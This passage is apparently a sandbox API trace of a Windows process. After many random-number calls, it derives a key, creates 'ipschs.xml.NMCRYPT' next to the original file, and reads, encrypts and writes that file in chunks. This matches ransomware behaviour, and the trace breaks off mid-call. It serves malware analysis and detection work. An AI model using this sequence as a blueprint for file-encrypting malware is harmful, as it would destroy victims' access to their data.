[0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.833] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.833] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.833] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0145.834] CryptHashData (hHash=0x9ad478, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.834] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad2b8) returned 1 [0145.834] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0145.834] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0145.834] wcslen (_String="\\\\?\\") returned 0x4 [0145.834] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0145.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0145.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0145.841] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2462) returned 1 [0145.841] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0145.842] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.148] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.148] GetLastError () returned 0x0 [0146.148] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.148] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.148] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.148] GetLastError () returned 0x0 [0146.148] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.149] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.150] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.150] GetLastError () returned 0x0 [0146.150] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.150] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.150] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.150] GetLastError () returned 0x0 [0146.150] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.151] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x9e, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x9e, lpOverlapped=0x0) returned 1 [0146.151] CryptEncrypt 